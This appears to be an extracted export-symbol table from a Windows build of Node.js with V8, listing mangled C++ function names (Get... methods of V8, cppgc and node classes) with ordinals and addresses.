                                                                                                                                                                                                        ?Get@WasmImportWrapperCache@wasm@internal@v8@@QEBAPEAVWasmCode@234@W4WasmImportCallKind@compiler@34@PEBV?$Signature@VValueType@wasm@internal@v8@@@34@H@Z69230x14054f760
                                                                                                                                                                                                        ?Get@WasmTableObject@internal@v8@@SA?AV?$Handle@VObject@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VWasmTableObject@internal@v8@@@23@I@Z69240x14052fe10
                                                                                                                                                                                                        ?Get@WeakMap@debug@v8@@QEAA?AV?$MaybeLocal@VValue@v8@@@3@V?$Local@VContext@v8@@@3@V?$Local@VValue@v8@@@3@@Z69250x140a6f0d0
                                                                                                                                                                                                        ?GetAbsoluteOffset@BytecodeArrayIterator@interpreter@internal@v8@@QEBAHH@Z69260x140913790
                                                                                                                                                                                                        ?GetAbstractPC@Isolate@internal@v8@@QEAA_KPEAH0@Z69270x140a11280
                                                                                                                                                                                                        ?GetAccessorIndex@LookupIterator@internal@v8@@QEBAHXZ69280x14081c570
                                                                                                                                                                                                        ?GetAccessors@LookupIterator@internal@v8@@QEBA?AV?$Handle@VObject@internal@v8@@@23@XZ69290x14081c580
                                                                                                                                                                                                        ?GetAddress@CFunction@v8@@QEBAPEBXXZ69300x140078aa0
                                                                                                                                                                                                        ?GetAddressHint@CodeRangeAddressHint@internal@v8@@QEAA_K_K@Z69310x1409f1c00
                                                                                                                                                                                                        ?GetAliases@RegisterConfiguration@internal@v8@@QEBAHW4MachineRepresentation@23@H0PEAH@Z69320x140a816a0
                                                                                                                                                                                                        ?GetAlignedPointerFromEmbedderData@Context@v8@@QEAAPEAXH@Z69330x140079330
                                                                                                                                                                                                        ?GetAlignedPointerFromInternalField@Object@v8@@QEAAPEAXH@Z69340x1400790d0
                                                                                                                                                                                                        ?GetAlignedPointerFromInternalField@Object@v8@@SAPEAXAEBV?$BasicTracedReference@VObject@v8@@@2@H@Z69350x140078c40
                                                                                                                                                                                                        ?GetAlignedPointerFromInternalField@Object@v8@@SAPEAXAEBV?$PersistentBase@VObject@v8@@@2@H@Z69360x140078c40
                                                                                                                                                                                                        ?GetAllocatableDoubleCode@RegisterConfiguration@internal@v8@@QEBAHH@Z69370x1405049c0
                                                                                                                                                                                                        ?GetAllocatableFloatCode@RegisterConfiguration@internal@v8@@QEBAHH@Z69380x1405049d0
                                                                                                                                                                                                        ?GetAllocatableGeneralCode@RegisterConfiguration@internal@v8@@QEBAHH@Z69390x1405049e0
                                                                                                                                                                                                        ?GetAllocatableSimd128Code@RegisterConfiguration@internal@v8@@QEBAHH@Z69400x1405049f0
                                                                                                                                                                                                        ?GetAllocatedSpillRange@TopLevelLiveRange@compiler@internal@v8@@QEBAPEAVSpillRange@234@XZ69410x140078ea0
                                                                                                                                                                                                        ?GetAllocationHandle@CppHeap@v8@@QEAAAEAVAllocationHandle@cppgc@@XZ69420x140462f10
                                                                                                                                                                                                        ?GetAllocationHandle@Heap@cppgc@@QEAAAEAVAllocationHandle@2@XZ69430x140462f10
                                                                                                                                                                                                        ?GetAllocationProfile@HeapProfiler@v8@@QEAAPEAVAllocationProfile@2@XZ69440x140b13b20
                                                                                                                                                                                                        ?GetAndClearCurrentDeoptimizer@Isolate@internal@v8@@QEAAPEAVDeoptimizer@23@XZ69450x140484200
                                                                                                                                                                                                        ?GetAndResetGlobalHandleResetCount@GlobalHandles@internal@v8@@QEAA_KXZ69460x140484240
                                                                                                                                                                                                        ?GetAndResetNextReferenceType@?$Deserializer@VIsolate@internal@v8@@@internal@v8@@AEAA?AW4HeapObjectReferenceType@23@XZ69470x1406d6fc0
                                                                                                                                                                                                        ?GetAndResetNextReferenceType@?$Deserializer@VLocalIsolate@internal@v8@@@internal@v8@@AEAA?AW4HeapObjectReferenceType@23@XZ69480x1406d6fc0
                                                                                                                                                                                                        ?GetArgumentsType@DeclarationScope@internal@v8@@QEBA?AW4CreateArgumentsType@23@XZ69490x1406eb4b0
                                                                                                                                                                                                        ?GetArrayBufferAllocator@Isolate@v8@@QEAAPEAVAllocator@ArrayBuffer@2@XZ69500x14048a250
                                                                                                                                                                                                        ?GetArrayBufferAllocator@node@@YAPEAVArrayBufferAllocator@1@PEAVIsolateData@1@@Z69510x14028c980
                                                                                                                                                                                                        ?GetArrayType@WasmModuleBuilder@wasm@internal@v8@@QEAAPEAVArrayType@234@I@Z69520x1405405b0
                                                                                                                                                                                                        ?GetAssignedOperand@LiveRange@compiler@internal@v8@@QEBA?AVInstructionOperand@234@XZ69530x140f868f0
                                                                                                                                                                                                        ?GetAsyncIterator@Symbol@v8@@SA?AV?$Local@VSymbol@v8@@@2@PEAVIsolate@2@@Z69540x140b13b30
                                                                                                                                                                                                        ?GetAvailableLocales@JSCollator@internal@v8@@SAAEBV?$set@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@V?$allocator@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@std@@XZ69550x140868320
                                                                                                                                                                                                        ?GetAvailableLocales@JSDateTimeFormat@internal@v8@@SAAEBV?$set@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@V?$allocator@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@std@@XZ69560x14082a750
                                                                                                                                                                                                        ?GetAvailableLocales@JSDisplayNames@internal@v8@@SAAEBV?$set@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@V?$allocator@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@std@@XZ69570x1408571b0
                                                                                                                                                                                                        ?GetAvailableLocales@JSListFormat@internal@v8@@SAAEBV?$set@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@V?$allocator@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@std@@XZ69580x140851bb0
                                                                                                                                                                                                        ?GetAvailableLocales@JSNumberFormat@internal@v8@@SAAEBV?$set@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@V?$allocator@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@std@@XZ69590x140845f70
                                                                                                                                                                                                        ?GetAvailableLocales@JSPluralRules@internal@v8@@SAAEBV?$set@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@V?$allocator@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@std@@XZ69600x14082df30
                                                                                                                                                                                                        ?GetAvailableLocales@JSRelativeTimeFormat@internal@v8@@SAAEBV?$set@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@V?$allocator@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@std@@XZ69610x14082a750
                                                                                                                                                                                                        ?GetAvailableLocales@JSSegmenter@internal@v8@@SAAEBV?$set@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@V?$allocator@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@std@@XZ69620x1408289d0
                                                                                                                                                                                                        ?GetAvailableLocales@JSV8BreakIterator@internal@v8@@SAAEBV?$set@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@V?$allocator@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@std@@XZ69630x1408289d0
                                                                                                                                                                                                        ?GetBackPointer@MapRef@compiler@internal@v8@@QEBA?AVHeapObjectRef@234@XZ69640x140e851f0
                                                                                                                                                                                                        ?GetBackReferencedObject@?$Deserializer@VIsolate@internal@v8@@@internal@v8@@IEAA?AV?$Handle@VHeapObject@internal@v8@@@23@XZ69650x1406d6fe0
                                                                                                                                                                                                        ?GetBackReferencedObject@?$Deserializer@VLocalIsolate@internal@v8@@@internal@v8@@IEAA?AV?$Handle@VHeapObject@internal@v8@@@23@XZ69660x1406d6fe0
                                                                                                                                                                                                        ?GetBackingStore@ArrayBuffer@v8@@QEAA?AV?$shared_ptr@VBackingStore@v8@@@std@@XZ69670x140b13b40
                                                                                                                                                                                                        ?GetBackingStore@SharedArrayBuffer@v8@@QEAA?AV?$shared_ptr@VBackingStore@v8@@@std@@XZ69680x140b13c80
                                                                                                                                                                                                        ?GetBailoutReason@CpuProfileNode@v8@@QEBAPEBDXZ69690x140b13dc0
                                                                                                                                                                                                        ?GetBarrierForBackgroundCompile@WasmEngine@wasm@internal@v8@@QEAA?AV?$shared_ptr@VOperationsBarrier@internal@v8@@@std@@XZ69700x1405573a0
                                                                                                                                                                                                        ?GetBaselineExecutionTier@WasmCompilationUnit@wasm@internal@v8@@SA?AW4ExecutionTier@234@PEBUWasmModule@234@@Z69710x1405c0770
                                                                                                                                                                                                        ?GetBinaryOperationFeedback@FeedbackNexus@internal@v8@@QEBA?AW4BinaryOperationHint@23@XZ69720x14087af60
                                                                                                                                                                                                        ?GetBitRepresentationFor@RepresentationChanger@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@W4MachineRepresentation@34@VType@234@@Z69730x1410a5340
                                                                                                                                                                                                        ?GetBlockById@Schedule@compiler@internal@v8@@QEAAPEAVBasicBlock@234@VId@5234@@Z69740x140ee2480
                                                                                                                                                                                                        ?GetBlockData@FunctionData@Coverage@debug@v8@@QEBA?AVBlockData@234@_K@Z69750x140a6f2b0
                                                                                                                                                                                                        ?GetBlockStart@InstructionSequence@compiler@internal@v8@@QEBAPEAVInstruction@234@VRpoNumber@234@@Z69760x140ea9010
                                                                                                                                                                                                        ?GetBoolOption@Intl@internal@v8@@SA?AV?$Maybe@_N@3@PEAVIsolate@23@V?$Handle@VJSReceiver@internal@v8@@@23@PEBD2PEA_N@Z69770x1408718e0
                                                                                                                                                                                                        ?GetBottom@FrameSummary@internal@v8@@SA?AV123@PEBVCommonFrame@23@@Z69780x140a21030
                                                                                                                                                                                                        ?GetBoundFunction@Function@v8@@QEBA?AV?$Local@VValue@v8@@@2@XZ69790x140b13de0
                                                                                                                                                                                                        ?GetBracketList@ControlEquivalence@compiler@internal@v8@@AEAAAEAV?$ZoneLinkedList@UBracket@ControlEquivalence@compiler@internal@v8@@@34@PEAVNode@234@@Z69800x141052250
                                                                                                                                                                                                        ?GetBreakLocation@BreakIterator@internal@v8@@QEAA?AVBreakLocation@23@XZ69810x140a60790
                                                                                                                                                                                                        ?GetBuffer@JSTypedArray@internal@v8@@QEAA?AV?$Handle@VJSArrayBuffer@internal@v8@@@23@XZ69820x14086be80
                                                                                                                                                                                                        ?GetBufferSize@EhFrameIterator@internal@v8@@QEAAHXZ69830x1404afc60
                                                                                                                                                                                                        ?GetBuild@Version@internal@v8@@SAHXZ69840x140528f90
                                                                                                                                                                                                        ?GetBytecodeArray@SharedFunctionInfoRef@compiler@internal@v8@@QEBA?AVBytecodeArrayRef@234@XZ69850x140e85340
                                                                                                                                                                                                        ?GetBytecodeDispatchCallDescriptor@Linkage@compiler@internal@v8@@SAPEAVCallDescriptor@234@PEAVZone@34@AEBVCallInterfaceDescriptor@34@H@Z69860x140eaac90
                                                                                                                                                                                                        ?GetBytecodeHandler@Interpreter@interpreter@internal@v8@@QEAA?AVCode@34@W4Bytecode@234@W4OperandScale@234@@Z69870x1408f1440
                                                                                                                                                                                                        ?GetBytecodeOffsetFromEntry@OSROptimizedCodeCache@internal@v8@@AEAA?AVBytecodeOffset@23@H@Z69880x1407dfd20
                                                                                                                                                                                                        ?GetCEntryStubCallDescriptor@Linkage@compiler@internal@v8@@SAPEAVCallDescriptor@234@PEAVZone@34@HHPEBDV?$Flags@W4Property@Operator@compiler@internal@v8@@E@base@4@V?$Flags@W4Flag@CallDescriptor@compiler@internal@v8@@H@84@W4StackArgumentOrder@34@@Z69890x140eaae70
                                                                                                                                                                                                        ?GetCachedNodes@JSGraph@compiler@internal@v8@@QEAAXPEAV?$ZoneVector@PEAVNode@compiler@internal@v8@@@34@@Z69900x140f55f60
                                                                                                                                                                                                        ?GetCallCount@FeedbackNexus@internal@v8@@QEAAHXZ69910x14087b020
                                                                                                                                                                                                        ?GetCallFeedbackContent@FeedbackNexus@internal@v8@@QEAA?AW4CallFeedbackContent@23@XZ69920x14087b060
                                                                                                                                                                                                        ?GetCallTarget@WasmInstanceObject@internal@v8@@QEAA_KI@Z69930x140530080
                                                                                                                                                                                                        ?GetCallTargetForFunction@NativeModule@wasm@internal@v8@@QEBA_KI@Z69940x14056b830
                                                                                                                                                                                                        ?GetCanonicalizedValue@InstructionOperand@compiler@internal@v8@@IEBA_KXZ69950x1404bbc40
                                                                                                                                                                                                        ?GetCapture@RegExpParser@internal@v8@@AEAAPEAVRegExpCapture@23@H@Z69960x14071d370
                                                                                                                                                                                                        ?GetChecksum@?$Deserializer@VIsolate@internal@v8@@@internal@v8@@QEBAIXZ69970x1406c3690
                                                                                                                                                                                                        ?GetChecksum@?$Deserializer@VLocalIsolate@internal@v8@@@internal@v8@@QEBAIXZ69980x1406c3690
                                                                                                                                                                                                        ?GetChild@CpuProfileNode@v8@@QEBAPEBV12@H@Z69990x140b13eb0
                                                                                                                                                                                                        ?GetChild@HeapGraphNode@v8@@QEBAPEBVHeapGraphEdge@2@H@Z70000x140b13ee0
                                                                                                                                                                                                        ?GetChildCovers@TopLevelLiveRange@compiler@internal@v8@@QEAAPEAVLiveRange@234@VLifetimePosition@234@@Z70010x140f86970
                                                                                                                                                                                                        ?GetChildrenCount@CpuProfileNode@v8@@QEBAHXZ70020x140b13f40
                                                                                                                                                                                                        ?GetChildrenCount@HeapGraphNode@v8@@QEBAHXZ70030x140b13f50
                                                                                                                                                                                                        ?GetChunkSize@OutputStream@v8@@UEAAHXZ70040x14007a050
                                                                                                                                                                                                        ?GetClass@ControlEquivalence@compiler@internal@v8@@AEAA_KPEAVNode@234@@Z70050x14104f580
                                                                                                                                                                                                        ?GetClosureScope@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEBAPEAVDeclarationScope@23@XZ70060x1407750c0
                                                                                                                                                                                                        ?GetClosureScope@Scope@internal@v8@@QEAAPEAVDeclarationScope@23@XZ70070x140af55a0
                                                                                                                                                                                                        ?GetClosureScope@Scope@internal@v8@@QEBAPEBVDeclarationScope@23@XZ70080x140af55a0
                                                                                                                                                                                                        ?GetCode@Assembler@internal@v8@@QEAAXPEAVIsolate@23@PEAVCodeDesc@23@@Z70090x14049b960
                                                                                                                                                                                                        ?GetCode@Assembler@internal@v8@@QEAAXPEAVIsolate@23@PEAVCodeDesc@23@PEAVSafepointTableBuilder@23@H@Z70100x14050c930
                                                                                                                                                                                                        ?GetCode@NativeModule@wasm@internal@v8@@QEBAPEAVWasmCode@234@I@Z70110x14056b860
                                                                                                                                                                                                        ?GetCode@RegExpBytecodeGenerator@internal@v8@@UEAA?AV?$Handle@VHeapObject@internal@v8@@@23@V?$Handle@VString@internal@v8@@@23@@Z70120x14073d5d0
                                                                                                                                                                                                        ?GetCode@RegExpMacroAssemblerX64@internal@v8@@UEAA?AV?$Handle@VHeapObject@internal@v8@@@23@V?$Handle@VString@internal@v8@@@23@@Z70130x1404accf0
                                                                                                                                                                                                        ?GetCode@SharedFunctionInfo@internal@v8@@QEBA?AVCode@23@XZ70140x1407d78a0
                                                                                                                                                                                                        ?GetCodeEventTypeName@CodeEvent@v8@@SAPEBDW4CodeEventType@2@@Z70150x140b13fd0
                                                                                                                                                                                                        ?GetCodeFromEntry@OSROptimizedCodeCache@internal@v8@@AEAA?AVCode@23@H@Z70160x1407dfd50
                                                                                                                                                                                                        ?GetCodeObjectStartFromInnerAddress@CodeObjectRegistry@internal@v8@@QEBA_K_K@Z70170x1409f21d0
                                                                                                                                                                                                        ?GetCodePages@Isolate@internal@v8@@QEBAPEAV?$vector@UMemoryRange@v8@@V?$allocator@UMemoryRange@v8@@@std@@@std@@XZ70180x140a11470
                                                                                                                                                                                                        ?GetCodeRange@Isolate@v8@@QEAAXPEAPEAXPEA_K@Z70190x140b140d0
                                                                                                                                                                                                        ?GetCodeSize@CodeEvent@v8@@QEAA_KXZ70200x140078d20
                                                                                                                                                                                                        ?GetCodeStartAddress@CodeEvent@v8@@QEAA_KXZ70210x140078d50
                                                                                                                                                                                                        ?GetCodeTarget@AssemblerBase@internal@v8@@IEBA?AV?$Handle@VCode@internal@v8@@@23@_J@Z70220x140ab43d0
                                                                                                                                                                                                        ?GetCodeTracer@Isolate@internal@v8@@QEAAPEAVCodeTracer@23@XZ70230x140a11480
                                                                                                                                                                                                        ?GetCodeTracer@WasmEngine@wasm@internal@v8@@QEAAPEAVCodeTracer@34@XZ70240x1405573e0
                                                                                                                                                                                                        ?GetCodeType@CodeEvent@v8@@QEAA?AW4CodeEventType@2@XZ70250x1403430c0
                                                                                                                                                                                                        ?GetColumn@StackFrame@v8@@QEBAHXZ70260x140b14110
                                                                                                                                                                                                        ?GetColumnNumber@CpuProfileNode@v8@@QEBAHXZ70270x140b14120
                                                                                                                                                                                                        ?GetColumnNumber@JSMessageObject@internal@v8@@QEBAHXZ70280x140836680
                                                                                                                                                                                                        ?GetColumnNumber@Location@debug@v8@@QEBAHXZ70290x140078ae0
                                                                                                                                                                                                        ?GetColumnNumber@Location@v8@@QEAAHXZ70300x140078ae0
                                                                                                                                                                                                        ?GetComment@CodeCommentsIterator@internal@v8@@QEBAPEBDXZ70310x140ab36b0
                                                                                                                                                                                                        ?GetComment@CodeEvent@v8@@QEAAPEBDXZ70320x140078ec0
                                                                                                                                                                                                        ?GetCommentSize@CodeCommentsIterator@internal@v8@@QEBAIXZ70330x140ab3700
                                                                                                                                                                                                        ?GetCommitPageSize@MemoryAllocator@internal@v8@@SA_JXZ70340x140975020
                                                                                                                                                                                                        ?GetCommonDominator@BasicBlock@compiler@internal@v8@@SAPEAV1234@PEAV1234@0@Z70350x140ee2490
                                                                                                                                                                                                        ?GetCommonSamplingInterval@CpuProfilesCollection@internal@v8@@QEBA?AVTimeDelta@base@3@XZ70360x14074e260
                                                                                                                                                                                                        ?GetCompareOperationFeedback@FeedbackNexus@internal@v8@@QEBA?AW4CompareOperationHint@23@XZ70370x14087b0a0
                                                                                                                                                                                                        ?GetCompiledModule@WasmModuleObject@v8@@QEAA?AVCompiledWasmModule@2@XZ70380x140b14130
                                                                                                                                                                                                        ?GetConcurrentlyMarkedBytes@IncrementalMarkingSchedule@internal@cppgc@@QEBA_KXZ70390x140078d20
                                                                                                                                                                                                        ?GetConsName@ProfilerListener@internal@v8@@QEAAPEBDPEBDVName@23@@Z70400x1407453a0
                                                                                                                                                                                                        ?GetConsName@StringsStorage@internal@v8@@QEAAPEBDPEBDVName@23@@Z70410x140746460
                                                                                                                                                                                                        ?GetConstant@InstructionSequence@compiler@internal@v8@@QEBA?AVConstant@234@H@Z70420x1404bbc90
                                                                                                                                                                                                        ?GetConstantAtIndexAsSmi@BytecodeArrayIterator@interpreter@internal@v8@@QEBA?AVSmi@34@H@Z70430x1409137a0
                                                                                                                                                                                                        ?GetConstantPoolEntry@BytecodeArrayBuilder@interpreter@internal@v8@@QEAA_KN@Z70440x14091e380
                                                                                                                                                                                                        ?GetConstantPoolEntry@BytecodeArrayBuilder@interpreter@internal@v8@@QEAA_KPEBVAstRawString@34@@Z70450x14091e390
                                                                                                                                                                                                        ?GetConstantPoolEntry@BytecodeArrayBuilder@interpreter@internal@v8@@QEAA_KPEBVScope@34@@Z70460x14091e3a0
                                                                                                                                                                                                        ?GetConstantPoolEntry@BytecodeArrayBuilder@interpreter@internal@v8@@QEAA_KVAstBigInt@34@@Z70470x14091e3b0
                                                                                                                                                                                                        ?GetConstructor@MapRef@compiler@internal@v8@@QEBA?AVObjectRef@234@XZ70480x140e859e0
                                                                                                                                                                                                        ?GetConstructor@V8HeapExplorer@internal@v8@@SA?AVJSFunction@23@VJSReceiver@23@@Z70490x1407578e0
                                                                                                                                                                                                        ?GetConstructorFeedback@FeedbackNexus@internal@v8@@QEBA?AV?$MaybeHandle@VJSObject@internal@v8@@@23@XZ70500x14087b150
                                                                                                                                                                                                        ?GetConstructorName@Object@v8@@QEAA?AV?$Local@VString@v8@@@2@XZ70510x140b14240
                                                                                                                                                                                                        ?GetConstructorName@V8HeapExplorer@internal@v8@@SA?AVString@23@VJSObject@23@@Z70520x1407579b0
                                                                                                                                                                                                        ?GetContents@ArrayBuffer@v8@@AEAA?AVContents@12@_N@Z70530x140b14270
                                                                                                                                                                                                        ?GetContents@ArrayBuffer@v8@@QEAA?AVContents@12@XZ70540x140b144b0
                                                                                                                                                                                                        ?GetContents@SharedArrayBuffer@v8@@AEAA?AVContents@12@_N@Z70550x140b144d0
                                                                                                                                                                                                        ?GetContents@SharedArrayBuffer@v8@@QEAA?AVContents@12@XZ70560x140b14710
                                                                                                                                                                                                        ?GetContext@Recorder@metrics@v8@@SA?AV?$MaybeLocal@VContext@v8@@@3@PEAVIsolate@3@VContextId@123@@Z70570x140b14730
                                                                                                                                                                                                        ?GetContextForMicrotask@JSReceiver@internal@v8@@SA?AV?$MaybeHandle@VNativeContext@internal@v8@@@23@V?$Handle@VJSReceiver@internal@v8@@@23@@Z70580x140836c80
                                                                                                                                                                                                        ?GetContextFromRecorderContextId@Isolate@internal@v8@@QEAA?AV?$MaybeLocal@VContext@v8@@@3@VContextId@Recorder@metrics@3@@Z70590x140a11590
                                                                                                                                                                                                        ?GetContextId@Recorder@metrics@v8@@SA?AVContextId@123@V?$Local@VContext@v8@@@3@@Z70600x140b14750
                                                                                                                                                                                                        ?GetContextInput@NodeProperties@compiler@internal@v8@@SAPEAVNode@234@PEAV5234@@Z70610x1404bbce0
                                                                                                                                                                                                        ?GetContextInputCount@OperatorProperties@compiler@internal@v8@@SAHPEBVOperator@234@@Z70620x1404bbd50
                                                                                                                                                                                                        ?GetContinuationPreservedEmbedderData@Context@v8@@QEBA?AV?$Local@VValue@v8@@@2@XZ70630x140b147e0
                                                                                                                                                                                                        ?GetControlInput@NodeProperties@compiler@internal@v8@@SAPEAVNode@234@PEAV5234@H@Z70640x1404bbd70
                                                                                                                                                                                                        ?GetCopy@StringsStorage@internal@v8@@QEAAPEBDPEBD@Z70650x1407465f0
                                                                                                                                                                                                        ?GetCoupledControlEdge@Scheduler@compiler@internal@v8@@AEAA?AV?$Optional@H@base@4@PEAVNode@234@@Z70660x141052550
                                                                                                                                                                                                        ?GetCoverageBitmap@BasicBlockProfiler@internal@v8@@QEAA?AV?$vector@_NV?$allocator@_N@std@@@std@@PEAVIsolate@23@@Z70670x140a46910
                                                                                                                                                                                                        ?GetCppHeap@Isolate@v8@@QEBAPEAVCppHeap@2@XZ70680x140b14870
                                                                                                                                                                                                        ?GetCreationContext@JSReceiver@internal@v8@@QEAA?AV?$MaybeHandle@VNativeContext@internal@v8@@@23@XZ70690x140836e30
                                                                                                                                                                                                        ?GetCreationContext@Object@v8@@QEAA?AV?$MaybeLocal@VContext@v8@@@2@XZ70700x140b14880
                                                                                                                                                                                                        ?GetCreationContext@Object@v8@@SA?AV?$MaybeLocal@VContext@v8@@@2@AEBV?$PersistentBase@VObject@v8@@@2@@Z70710x140078c90
                                                                                                                                                                                                        ?GetCtrl@SwissNameDictionary@internal@v8@@AEAACH@Z70720x140484250
                                                                                                                                                                                                        ?GetCurrent@Isolate@v8@@SAPEAV12@XZ70730x140483130
                                                                                                                                                                                                        ?GetCurrentAllocatedBytes@StatsScope@ZoneStats@compiler@internal@v8@@QEAA_KXZ70740x14104c720
                                                                                                                                                                                                        ?GetCurrentAllocatedBytes@ZoneStats@compiler@internal@v8@@QEBA_KXZ70750x14104c7d0
                                                                                                                                                                                                        ?GetCurrentContext@Isolate@v8@@QEAA?AV?$Local@VContext@v8@@@2@XZ70760x140b148d0
                                                                                                                                                                                                        ?GetCurrentDepth@MicrotasksScope@v8@@SAHPEAVIsolate@2@@Z70770x140b14980
                                                                                                                                                                                                        ?GetCurrentEnvironment@node@@YAPEAVEnvironment@1@V?$Local@VContext@v8@@@v8@@@Z70780x14028c990
                                                                                                                                                                                                        ?GetCurrentEventLoop@node@@YAPEAUuv_loop_s@@PEAVIsolate@v8@@@Z70790x14028c9e0
                                                                                                                                                                                                        ?GetCurrentExternalSourcePosition@RawMachineAssembler@compiler@internal@v8@@QEBA?AU?$pair@PEBDH@std@@XZ70800x14108d1b0
                                                                                                                                                                                                        ?GetCurrentMemoryUsage@AccountingAllocator@internal@v8@@QEBA_KXZ70810x140078d50
                                                                                                                                                                                                        ?GetCurrentMemoryUsage@StringTable@internal@v8@@QEBA_KXZ70820x1407ca830
                                                                                                                                                                                                        ?GetCurrentOffset@EhFrameIterator@internal@v8@@QEBAHXZ70830x1404afc70
                                                                                                                                                                                                        ?GetCurrentPlatform@V8@internal@v8@@SAPEAVPlatform@3@XZ70840x1409245b0
                                                                                                                                                                                                        ?GetCurrentPosition@SourcePositionTable@compiler@internal@v8@@QEBA?AVSourcePosition@34@XZ70850x1404508b0
                                                                                                                                                                                                        ?GetCurrentProcessId@OS@base@v8@@SAHXZ70860x1402a1f30
                                                                                                                                                                                                        ?GetCurrentStackPosition@Stack@base@v8@@SA?AUStackSlot@123@XZ70870x140e601b0
                                                                                                                                                                                                        ?GetCurrentStackPosition@internal@v8@@YA_KXZ70880x1406b3250
                                                                                                                                                                                                        ?GetCurrentThreadId@OS@base@v8@@SAHXZ70890x1402f3180
                                                                                                                                                                                                        ?GetCurrentThreadId@ThreadId@internal@v8@@CAHXZ70900x140a00660
                                                                                                                                                                                                        ?GetData@ControlEquivalence@compiler@internal@v8@@AEAAPEAUNodeData@1234@PEAVNode@234@@Z70910x1410525f0
                                                                                                                                                                                                        ?GetData@Isolate@internal@v8@@QEBAPEAXI@Z70920x140484270
                                                                                                                                                                                                        ?GetData@Isolate@v8@@QEAAPEAXI@Z70930x1400792c0
                                                                                                                                                                                                        ?GetData@Scheduler@compiler@internal@v8@@AEAAPEAUSchedulerData@1234@PEAVNode@234@@Z70940x141052640
                                                                                                                                                                                                        ?GetDataFromSnapshotOnce@Context@v8@@AEAAPEA_K_K@Z70950x140b14990
                                                                                                                                                                                                        ?GetDataFromSnapshotOnce@Isolate@v8@@AEAAPEA_K_K@Z70960x140b149c0
                                                                                                                                                                                                        ?GetDataProperty@JSReceiver@internal@v8@@SA?AV?$Handle@VObject@internal@v8@@@23@PEAVLookupIterator@23@W4AllocationPolicy@23@@Z70970x140836f90
                                                                                                                                                                                                        ?GetDataValue@LookupIterator@internal@v8@@QEBA?AV?$Handle@VObject@internal@v8@@@23@W4AllocationPolicy@23@@Z70980x14081c5a0
                                                                                                                                                                                                        ?GetDaylightSavingsOffsetFromOS@DateCache@internal@v8@@UEAAH_J@Z70990x140705e20
                                                                                                                                                                                                        ?GetDebugBreak@Bytecodes@interpreter@internal@v8@@SA?AW4Bytecode@234@W45234@@Z71000x1408f6460
                                                                                                                                                                                                        ?GetDebugBreakType@BreakIterator@internal@v8@@AEAA?AW4DebugBreakType@23@XZ71010x140a60960
                                                                                                                                                                                                        ?GetDebugInfo@NativeModule@wasm@internal@v8@@QEAAPEAVDebugInfo@234@XZ71020x14056b9f0
                                                                                                                                                                                                        ?GetDebugName@Function@v8@@QEBA?AV?$Local@VValue@v8@@@2@XZ71030x140b149d0
                                                                                                                                                                                                        ?GetDebugName@OptimizedCompilationInfo@internal@v8@@QEBA?AV?$unique_ptr@$$BY0A@DU?$default_delete@$$BY0A@D@std@@@std@@XZ71040x140a828e0
                                                                                                                                                                                                        ?GetDebugSideTableIfExists@DebugInfo@wasm@internal@v8@@QEBAPEAVDebugSideTable@234@PEBVWasmCode@234@@Z71050x140560c00
                                                                                                                                                                                                        ?GetDeclarationScope@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEBAPEAVDeclarationScope@23@XZ71060x1407750d0
                                                                                                                                                                                                        ?GetDeclarationScope@Scope@internal@v8@@QEAAPEAVDeclarationScope@23@XZ71070x140af55c0
                                                                                                                                                                                                        ?GetDefaultStrings@Parser@internal@v8@@AEAAXPEAPEBVAstRawString@23@0@Z71080x1407750e0
                                                                                                                                                                                                        ?GetDefaultWrapperDescriptor@LocalEmbedderHeapTracer@internal@v8@@CA?AUWrapperDescriptor@3@XZ71090x140953120
                                                                                                                                                                                                        ?GetDeoptInfos@CpuProfileNode@v8@@QEBAAEBV?$vector@UCpuProfileDeoptInfo@v8@@V?$allocator@UCpuProfileDeoptInfo@v8@@@std@@@std@@XZ71100x140491fa0
                                                                                                                                                                                                        ?GetDeoptWithResumeBuiltin@Deoptimizer@internal@v8@@SA?AW4Builtin@23@W4DeoptimizeReason@23@@Z71110x140a54b70
                                                                                                                                                                                                        ?GetDeoptimizationEntry@CodeGenerator@compiler@internal@v8@@AEAAAEBVDeoptimizationEntry@234@PEAVInstruction@234@_K@Z71120x140ee8070
                                                                                                                                                                                                        ?GetDeoptimizationEntry@Deoptimizer@internal@v8@@SA?AW4Builtin@23@W4DeoptimizeKind@23@@Z71130x140a54bb0
